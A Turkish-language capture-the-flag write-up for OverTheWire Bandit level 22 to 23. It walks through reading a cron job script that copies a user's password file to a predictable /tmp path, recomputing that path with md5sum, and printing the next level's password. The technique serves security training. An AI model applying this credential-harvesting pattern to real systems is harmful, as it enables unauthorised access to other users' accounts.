[ İstenilen ]

Level22 -> Level23

Bir program cron tarafından düzenli aralıklarla zaman temelli iş planlayıcıdan otomatik
olarak çalışır.Yapılandırma için /etc/cron.d/ dosyasına bakın ve hangi dosyanın
çalışmakta olduğunu görün.

NOT : Dosyanın içeriğini anlamakta güçlük çekiyorsanız dosyayı çalıştırmak faydalı olabilir.


[ Çözüm ]

Step0	: cd /etc/cron.d

Step1	: ls -l
Output	:
total 92
-r--r----- 1 root root  46 Nov 14  2014 behemoth4_cleanup
-rw-r--r-- 1 root root 355 May 25  2013 cron-apt
-rw-r--r-- 1 root root  61 Nov 14  2014 cronjob_bandit22
-rw-r--r-- 1 root root  62 Nov 14  2014 cronjob_bandit23
-rw-r--r-- 1 root root  61 May  3  2015 cronjob_bandit24
-rw-r--r-- 1 root root  62 May  3  2015 cronjob_bandit24_root
-r--r----- 1 root root  47 Nov 14  2014 leviathan5_cleanup
-rw------- 1 root root 233 Nov 14  2014 manpage3_resetpw_job
-rw-r--r-- 1 root root  51 Nov 14  2014 melinda-stats
-rw-r--r-- 1 root root  54 Jun 25  2016 natas-session-toucher
-rw-r--r-- 1 root root  49 Jun 25  2016 natas-stats
-r--r----- 1 root root  44 Jun 25  2016 natas25_cleanup
-r--r----- 1 root root  47 Aug  3  2015 natas25_cleanup~
-r--r----- 1 root root  47 Jun 25  2016 natas26_cleanup
-r--r----- 1 root root  43 Jun 25  2016 natas27_cleanup
-rw-r--r-- 1 root root 510 Oct 29  2014 php5
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-32
-rw-r--r-- 1 root root  63 Jul  8  2015 semtex0-64
-rw-r--r-- 1 root root  64 Jul  8  2015 semtex0-ppc
-rw-r--r-- 1 root root  35 Nov 14  2014 semtex5
-rw-r--r-- 1 root root 396 Nov 10  2013 sysstat
-rw-r--r-- 1 root root  29 Nov 14  2014 vortex0
-rw-r--r-- 1 root root  30 Nov 14  2014 vortex20

Step2	: cat cronjob_bandit23
Output	: * * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

Step3	: cat /usr/bin/cronjob_bandit23.sh
Output	:
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

Step4	: whoami
Output	: bandit22

Step5	: echo I am user bandit23 | md5sum | cut -d ' ' -f 1
Output	: 8ca319486bfbbc3663ea0fbe81326349

Step6	: cat /tmp/8ca319486bfbbc3663ea0fbe81326349
Output	: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

